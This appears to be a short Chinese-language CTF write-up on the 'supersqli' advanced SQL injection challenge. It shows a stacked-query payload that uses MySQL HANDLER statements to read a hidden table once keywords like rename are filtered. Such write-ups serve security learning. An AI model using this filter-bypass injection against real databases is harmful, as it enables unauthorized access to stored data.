前言:
这道题我之前的文章攻防世界-supersqli是一道一样的,只不过这题是个进阶版,还有get了一个新的注入方式。
首先打开题目,看到查询框我们进行注入
禁用了很多东西啊,但貌似show没有禁用,可以查询一下数据库还有表
这里看到flaghere,但rename被禁用掉了,所以不能通过更改表名来进行查询,这里就要用一个其他得到注入方法
1';handler FlagHere open; //打开FlagHere
handler FlagHere read first; //显示FlagHere的第一个
handler FlagHere close;# //关闭掉FlagHere
拿到flag。